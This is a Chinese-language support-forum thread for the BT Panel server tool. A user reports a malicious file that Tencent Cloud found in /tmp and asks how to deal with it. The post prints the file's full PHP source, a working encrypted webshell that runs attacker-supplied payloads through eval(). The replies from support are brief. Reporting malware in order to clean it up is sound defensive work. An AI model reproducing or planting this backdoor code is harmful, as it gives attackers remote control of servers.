【待反馈】tmp这个目录下出现了一个恶意文件，是腾讯云...

为了能快速了解并处理您的问题，请提供以下基础信息：

面板、插件版本：8.0.5

[/quote]
[quote]问题描述：tmp这个目录下出现了一个恶意文件，是腾讯云那边检测到...、
下面是恶意代码：
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
      $c = $K[$i+1&15];
      $D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
      $payload=encode($_SESSION[$payloadName],$key);
      if (strpos($payload,"getBasicsInfo")===false){
         $payload=encode($payload,$key);
      }
            eval($payload);
      echo substr(md5($pass.$key),0,16);
      echo base64_encode(encode(@run($data),$key));
      echo substr(md5($pass.$key),16);
}else{
      if (strpos($data,"getBasicsInfo")!==false){
         $_SESSION[$payloadName]=encode($data,$key);
      }
}
}
exit('77770123');

宝塔用户_wimffm · 发表于 2024-6-17 17:42:46

需要怎么处理，或者怎么排查还有没有其他恶意文件

运维技术阿闯 · 发表于 2024-6-17 18:17:31

宝塔用户_wimffm 发表于 2024-6-17 17:42
需要怎么处理，或者怎么排查还有没有其他恶意文件

您好，方便发一下文件名字吗

宝塔用户_wimffm · 发表于 2024-7-10 11:38:04

/tmp/phpFboigN

运维技术阿闯 · 发表于 2024-7-10 14:30:31

宝塔用户_wimffm 发表于 2024-7-10 11:38
/tmp/phpFboigN

将这个文件进行修改一下，这边看了里边的指令好像是一下加密的脚本

█ 菠萝云-主机特惠16G内存100元 █	【阿里云】低至5折	APP分发-无行业限制免审核	16核16G高防189元	【多途云】高防CDN
高防服务器，无视一切流量攻击	【恒爱云】香港2核1G 3M 15元/起	香港站群金牌Gold 6138大促销	【阿里云】宝塔一键部署，低至5折	OV/EV SSL证书，可当日签发
█ 易探云·香港/美国vps仅9元 █	CDN无视各类攻击\|无效退款	OV/EV SSL证书，可当日签发	【云防护】专注域名和网站安全防护	AWS CDN 4分，多家公有云代理